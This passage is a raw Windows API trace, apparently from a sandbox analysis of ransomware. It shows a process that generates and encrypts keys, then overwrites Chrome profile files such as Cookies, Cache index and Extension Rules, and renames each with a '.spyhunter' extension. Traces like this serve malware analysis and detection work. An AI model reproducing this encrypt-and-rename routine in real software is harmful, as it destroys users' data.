hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5c0 | out: pbBuffer=0x25cf5c0) returned 1 [0132.021] GetProcessHeap () returned 0x2c0000 [0132.021] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.021] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5b8*=0x30) returned 1 [0132.022] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.024] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log") returned 119 [0132.024] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0132.025] GetProcessHeap () returned 0x2c0000 [0132.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.025] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf57c*=0x0, lpOverlapped=0x0) returned 1 [0132.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.025] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf57c*=0x0, lpOverlapped=0x0) returned 1 [0132.025] GetProcessHeap () returned 0x2c0000 [0132.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.025] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.025] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5bc*, lpNumberOfBytesWritten=0x25cf57c*=0x4, lpOverlapped=0x0) returned 1 [0132.026] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf57c*=0x30, lpOverlapped=0x0) returned 1 [0132.026] CloseHandle (hObject=0x158) returned 1 [0132.026] GetProcessHeap () returned 0x2c0000 [0132.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.026] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.spyhunter") returned 129 [0132.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\data_reduction_proxy_leveldb\\000003.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\data_reduction_proxy_leveldb\\000003.log.spyhunter")) returned 1 [0132.026] GetProcessHeap () returned 0x2c0000 [0132.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.027] GetProcessHeap () returned 0x2c0000 [0132.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.027] GetProcessHeap () returned 0x2c0000 [0132.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f47820 | out: hHeap=0x2c0000) returned 1 [0132.027] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5c0 | out: pbBuffer=0x25cf5c0) returned 1 [0132.027] GetProcessHeap () returned 0x2c0000 [0132.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.027] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5b8*=0x30) returned 1 [0132.027] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.027] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal") returned 95 [0132.027] StrStrW (lpFirst="Cookies-journal", lpSrch=".txt") returned 0x0 [0132.027] GetProcessHeap () returned 0x2c0000 [0132.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.027] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf57c*=0x0, lpOverlapped=0x0) returned 1 [0132.027] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.028] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf57c*=0x0, lpOverlapped=0x0) returned 1 [0132.028] GetProcessHeap () returned 0x2c0000 [0132.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.028] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.028] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5bc*, lpNumberOfBytesWritten=0x25cf57c*=0x4, lpOverlapped=0x0) returned 1 [0132.029] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf57c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf57c*=0x30, lpOverlapped=0x0) returned 1 [0132.029] CloseHandle (hObject=0x158) returned 1 [0132.029] GetProcessHeap () returned 0x2c0000 [0132.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fa3c88 [0132.029] wnsprintfW (in: pszDest=0x2fa3c88, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal.spyhunter") returned 105 [0132.029] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies-journal.spyhunter")) returned 1 [0132.029] GetProcessHeap () returned 0x2c0000 [0132.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fa3c88 | out: hHeap=0x2c0000) returned 1 [0132.029] GetProcessHeap () returned 0x2c0000 [0132.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.030] GetProcessHeap () returned 0x2c0000 [0132.030] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4b670 | out: hHeap=0x2c0000) returned 1 [0132.030] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5b8 | out: pbBuffer=0x25cf5b8) returned 1 [0132.030] GetProcessHeap () returned 0x2c0000 [0132.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.030] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5b0*=0x30) returned 1 [0132.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0132.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies") returned 87 [0132.030] StrStrW (lpFirst="Cookies", lpSrch=".txt") returned 0x0 [0132.030] GetProcessHeap () returned 0x2c0000 [0132.030] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0132.030] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf574*=0x1c00, lpOverlapped=0x0) returned 1 [0132.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe400, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.035] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1c00, lpNumberOfBytesWritten=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf574*=0x1c00, lpOverlapped=0x0) returned 1 [0132.035] GetProcessHeap () returned 0x2c0000 [0132.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0132.035] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.035] WriteFile (in: hFile=0x158, lpBuffer=0x25cf5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x25cf5b4*, lpNumberOfBytesWritten=0x25cf574*=0x4, lpOverlapped=0x0) returned 1 [0132.036] WriteFile (in: hFile=0x158, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf574*=0x30, lpOverlapped=0x0) returned 1 [0132.036] CloseHandle (hObject=0x158) returned 1 [0132.036] GetProcessHeap () returned 0x2c0000 [0132.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0132.036] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.spyhunter") returned 97 [0132.036] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cookies.spyhunter")) returned 1 [0132.036] GetProcessHeap () returned 0x2c0000 [0132.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0132.037] GetProcessHeap () returned 0x2c0000 [0132.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0132.037] GetProcessHeap () returned 0x2c0000 [0132.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38d50 | out: hHeap=0x2c0000) returned 1 [0132.037] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5b8 | out: pbBuffer=0x25cf5b8) returned 1 [0132.037] GetProcessHeap () returned 0x2c0000 [0132.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0132.037] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5b0*=0x30) returned 1 [0132.037] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0132.086] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned 91 [0132.086] StrStrW (lpFirst="index", lpSrch=".txt") returned 0x0 [0132.086] GetProcessHeap () returned 0x2c0000 [0132.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0132.087] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf574*=0x2800, lpOverlapped=0x0) returned 1 [0132.998] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0132.998] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf574*=0x2800, lpOverlapped=0x0) returned 1 [0132.998] GetProcessHeap () returned 0x2c0000 [0132.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0132.998] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.998] WriteFile (in: hFile=0xec, lpBuffer=0x25cf5b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x25cf5b4*, lpNumberOfBytesWritten=0x25cf574*=0x4, lpOverlapped=0x0) returned 1 [0133.000] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf574, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf574*=0x30, lpOverlapped=0x0) returned 1 [0133.000] CloseHandle (hObject=0xec) returned 1 [0133.000] GetProcessHeap () returned 0x2c0000 [0133.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.001] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.spyhunter") returned 101 [0133.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\cache\\index.spyhunter")) returned 1 [0133.001] GetProcessHeap () returned 0x2c0000 [0133.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.001] GetProcessHeap () returned 0x2c0000 [0133.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.001] GetProcessHeap () returned 0x2c0000 [0133.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f45128 | out: hHeap=0x2c0000) returned 1 [0133.002] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5b0 | out: pbBuffer=0x25cf5b0) returned 1 [0133.002] GetProcessHeap () returned 0x2c0000 [0133.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.002] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5a8*=0x30) returned 1 [0133.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG") returned 99 [0133.003] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0133.003] GetProcessHeap () returned 0x2c0000 [0133.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.003] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf56c*=0x9a, lpOverlapped=0x0) returned 1 [0133.004] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.004] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf56c*=0x9a, lpOverlapped=0x0) returned 1 [0133.004] GetProcessHeap () returned 0x2c0000 [0133.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.004] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.004] WriteFile (in: hFile=0xec, lpBuffer=0x25cf5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5ac*, lpNumberOfBytesWritten=0x25cf56c*=0x4, lpOverlapped=0x0) returned 1 [0133.004] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf56c*=0x30, lpOverlapped=0x0) returned 1 [0133.005] CloseHandle (hObject=0xec) returned 1 [0133.005] GetProcessHeap () returned 0x2c0000 [0133.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.005] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.spyhunter") returned 109 [0133.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOG.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\log.spyhunter")) returned 1 [0133.005] GetProcessHeap () returned 0x2c0000 [0133.005] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.005] GetProcessHeap () returned 0x2c0000 [0133.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.006] GetProcessHeap () returned 0x2c0000 [0133.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29ae8 | out: hHeap=0x2c0000) returned 1 [0133.006] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5b0 | out: pbBuffer=0x25cf5b0) returned 1 [0133.006] GetProcessHeap () returned 0x2c0000 [0133.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.006] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5a8*=0x30) returned 1 [0133.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.007] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK") returned 100 [0133.007] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0133.007] GetProcessHeap () returned 0x2c0000 [0133.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.007] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf56c*=0x0, lpOverlapped=0x0) returned 1 [0133.007] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.007] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf56c*=0x0, lpOverlapped=0x0) returned 1 [0133.007] GetProcessHeap () returned 0x2c0000 [0133.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.007] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.007] WriteFile (in: hFile=0xec, lpBuffer=0x25cf5ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x25cf5ac*, lpNumberOfBytesWritten=0x25cf56c*=0x4, lpOverlapped=0x0) returned 1 [0133.008] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf56c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf56c*=0x30, lpOverlapped=0x0) returned 1 [0133.008] CloseHandle (hObject=0xec) returned 1 [0133.009] GetProcessHeap () returned 0x2c0000 [0133.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.009] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.spyhunter") returned 110 [0133.009] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\LOCK.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\lock.spyhunter")) returned 1 [0133.009] GetProcessHeap () returned 0x2c0000 [0133.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.009] GetProcessHeap () returned 0x2c0000 [0133.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.010] GetProcessHeap () returned 0x2c0000 [0133.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f297a0 | out: 